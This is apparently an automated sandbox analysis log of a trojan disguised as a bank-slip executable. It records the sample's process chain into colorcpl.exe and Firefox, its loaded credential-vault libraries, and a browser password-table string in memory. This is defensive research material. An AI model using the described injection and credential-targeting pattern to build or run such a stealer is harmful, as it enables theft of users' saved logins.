                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0185FA492_2_0185FA49
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017E5AA02_2_017E5AA0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01813A6C2_2_01813A6C
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017A3D402_2_017A3D40
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017BFDC02_2_017BFDC0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01851D5A2_2_01851D5A
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01857D732_2_01857D73
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0185FCF22_2_0185FCF2
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01819C322_2_01819C32
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0185FFB12_2_0185FFB1
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0185FF092_2_0185FF09
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01763FD52_2_01763FD5
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01763FD22_2_01763FD2
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017A1F922_2_017A1F92
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017A9EB02_2_017A9EB0
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exeCode function: 4_2_0433A9A54_2_0433A9A5
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exeCode function: 4_2_0435B5684_2_0435B568
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exeCode function: 4_2_04344E684_2_04344E68
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exeCode function: 4_2_0433C7584_2_0433C758
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exeCode function: 4_2_043430A84_2_043430A8
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exeCode function: 4_2_0433C9784_2_0433C978
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exeCode function: 4_2_0433A9F84_2_0433A9F8
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exeCode function: 4_2_0433ABD04_2_0433ABD0
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exeCode function: 4_2_06C0CE4D4_2_06C0CE4D
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exeCode function: 4_2_06C1379D4_2_06C1379D
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exeCode function: 4_2_06C11F0D4_2_06C11F0D
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exeCode function: 4_2_06C2BC5D4_2_06C2BC5D
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exeCode function: 4_2_06C1555D4_2_06C1555D
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exeCode function: 4_2_06C0B2C54_2_06C0B2C5
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exeCode function: 4_2_06C0B0ED4_2_06C0B0ED
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exeCode function: 4_2_06C0D06D4_2_06C0D06D
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_052605357_2_05260535
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_053205917_2_05320591
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_053044207_2_05304420
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_053124467_2_05312446
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0530E4F67_2_0530E4F6
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_052607707_2_05260770
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_052847507_2_05284750
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0525C7C07_2_0525C7C0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0527C6E07_2_0527C6E0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_052501007_2_05250100
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_052FA1187_2_052FA118
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_052E81587_2_052E8158
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_053141A27_2_053141A2
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_053201AA7_2_053201AA
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_053181CC7_2_053181CC
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_052F20007_2_052F2000
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0531A3527_2_0531A352
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_053203E67_2_053203E6
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0526E3F07_2_0526E3F0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_053002747_2_05300274
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_052E02C07_2_052E02C0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0526AD007_2_0526AD00
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_052FCD1F7_2_052FCD1F
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_05278DBF7_2_05278DBF
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0525ADE07_2_0525ADE0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_05260C007_2_05260C00
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_05300CB57_2_05300CB5
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_05250CF27_2_05250CF2
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_05302F307_2_05302F30
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_052A2F287_2_052A2F28
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_05280F307_2_05280F30
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_052D4F407_2_052D4F40
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_052DEFA07_2_052DEFA0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_05252FC87_2_05252FC8
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0531EE267_2_0531EE26
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_05260E597_2_05260E59
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0531CE937_2_0531CE93
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_05272E907_2_05272E90
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0531EEDB7_2_0531EEDB
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_052769627_2_05276962
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_052629A07_2_052629A0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0532A9A67_2_0532A9A6
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_052628407_2_05262840
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0526A8407_2_0526A840
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_052468B87_2_052468B8
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0528E8F07_2_0528E8F0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0531AB407_2_0531AB40
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_05316BD77_2_05316BD7
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0525EA807_2_0525EA80
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_053175717_2_05317571
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_052FD5B07_2_052FD5B0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_053295C37_2_053295C3
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0531F43F7_2_0531F43F
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_052514607_2_05251460
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0531F7B07_2_0531F7B0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_052A56307_2_052A5630
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_053116CC7_2_053116CC
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0529516C7_2_0529516C
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0524F1727_2_0524F172
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0532B16B7_2_0532B16B
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0526B1B07_2_0526B1B0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0531F0E07_2_0531F0E0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_053170E97_2_053170E9
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_052670C07_2_052670C0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0530F0CC7_2_0530F0CC
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0531132D7_2_0531132D
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0524D34C7_2_0524D34C
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_052A739A7_2_052A739A
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_052652A07_2_052652A0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0527D2F07_2_0527D2F0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_053012ED7_2_053012ED
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0527B2C07_2_0527B2C0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_05317D737_2_05317D73
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_05263D407_2_05263D40
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_05311D5A7_2_05311D5A
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0527FDC07_2_0527FDC0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_052D9C327_2_052D9C32
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0531FCF27_2_0531FCF2
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0531FF097_2_0531FF09
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0531FFB17_2_0531FFB1
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_05261F927_2_05261F92
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_05223FD27_2_05223FD2
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_05223FD57_2_05223FD5
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_05269EB07_2_05269EB0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_052F59107_2_052F5910
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_052699507_2_05269950
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0527B9507_2_0527B950
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_052CD8007_2_052CD800
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_052638E07_2_052638E0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0531FB767_2_0531FB76
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0527FB807_2_0527FB80
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0529DBF97_2_0529DBF9
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_052D5BF07_2_052D5BF0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_052D3A6C7_2_052D3A6C
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_05317A467_2_05317A46
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0531FA497_2_0531FA49
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_052FDAAC7_2_052FDAAC
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_052A5AA07_2_052A5AA0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_05301AA37_2_05301AA3
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0530DAC67_2_0530DAC6
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_03211B107_2_03211B10
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0320CA507_2_0320CA50
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0320AEC87_2_0320AEC8
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0320CC707_2_0320CC70
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0320ACF07_2_0320ACF0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_032133A07_2_032133A0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_032151607_2_03215160
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0322B8607_2_0322B860
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0514E75C7_2_0514E75C
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0514E3C67_2_0514E3C6
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0514E2A47_2_0514E2A4
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0514D8287_2_0514D828
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 052DF290 appears 103 times
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 05295130 appears 58 times
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 052A7E54 appears 107 times
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 052CEA12 appears 86 times
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 0524B970 appears 262 times
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: String function: 017E7E54 appears 107 times
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: String function: 017D5130 appears 58 times
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: String function: 0180EA12 appears 86 times
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: String function: 0178B970 appears 262 times
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: String function: 0181F290 appears 103 times
                Source: PO1268931024 - Bank Slip.exe, 00000000.00000002.1768400700.000000000105E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs PO1268931024 - Bank Slip.exe
                Source: PO1268931024 - Bank Slip.exe, 00000000.00000002.1784243858.000000000A020000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs PO1268931024 - Bank Slip.exe
                Source: PO1268931024 - Bank Slip.exe, 00000002.00000002.1974188510.00000000014A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamecolorcpl.exej% vs PO1268931024 - Bank Slip.exe
                Source: PO1268931024 - Bank Slip.exe, 00000002.00000002.1974347040.000000000188D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PO1268931024 - Bank Slip.exe
                Source: PO1268931024 - Bank Slip.exeBinary or memory string: OriginalFilenamePbnE.exeF vs PO1268931024 - Bank Slip.exe
                Source: PO1268931024 - Bank Slip.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: PO1268931024 - Bank Slip.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.PO1268931024 - Bank Slip.exe.5930000.2.raw.unpack, at4ONG9F0NYCELN5Tj.csCryptographic APIs: 'CreateDecryptor'
                Source: 0.2.PO1268931024 - Bank Slip.exe.414e790.1.raw.unpack, at4ONG9F0NYCELN5Tj.csCryptographic APIs: 'CreateDecryptor'
                Source: 0.2.PO1268931024 - Bank Slip.exe.a020000.3.raw.unpack, p4J06R29nMDv7rCX0R.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.PO1268931024 - Bank Slip.exe.a020000.3.raw.unpack, p4J06R29nMDv7rCX0R.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.PO1268931024 - Bank Slip.exe.a020000.3.raw.unpack, p4J06R29nMDv7rCX0R.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.PO1268931024 - Bank Slip.exe.44221f0.0.raw.unpack, qJpY5kwCJw8gj8Ev7k.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.PO1268931024 - Bank Slip.exe.a020000.3.raw.unpack, qJpY5kwCJw8gj8Ev7k.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.PO1268931024 - Bank Slip.exe.44221f0.0.raw.unpack, p4J06R29nMDv7rCX0R.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.PO1268931024 - Bank Slip.exe.44221f0.0.raw.unpack, p4J06R29nMDv7rCX0R.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.PO1268931024 - Bank Slip.exe.44221f0.0.raw.unpack, p4J06R29nMDv7rCX0R.csSecurity API names: _0020.AddAccessRule
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@15/12
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PO1268931024 - Bank Slip.exe.logJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeMutant created: NULL
                Source: C:\Windows\SysWOW64\colorcpl.exeFile created: C:\Users\user\AppData\Local\Temp\Ea64OHKqJump to behavior
                Source: PO1268931024 - Bank Slip.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: PO1268931024 - Bank Slip.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: colorcpl.exe, 00000007.00000002.4157400312.00000000035FA000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000007.00000003.2156270139.00000000035FA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: PO1268931024 - Bank Slip.exeReversingLabs: Detection: 52%
                Source: unknownProcess created: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exe "C:\Users\user\Desktop\PO1268931024 - Bank Slip.exe"
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeProcess created: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exe "C:\Users\user\Desktop\PO1268931024 - Bank Slip.exe"
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exeProcess created: C:\Windows\SysWOW64\colorcpl.exe "C:\Windows\SysWOW64\colorcpl.exe"
                Source: C:\Windows\SysWOW64\colorcpl.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeProcess created: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exe "C:\Users\user\Desktop\PO1268931024 - Bank Slip.exe"Jump to behavior
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exeProcess created: C:\Windows\SysWOW64\colorcpl.exe "C:\Windows\SysWOW64\colorcpl.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: colorui.dllJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: mscms.dllJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: coloradapterclient.dllJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
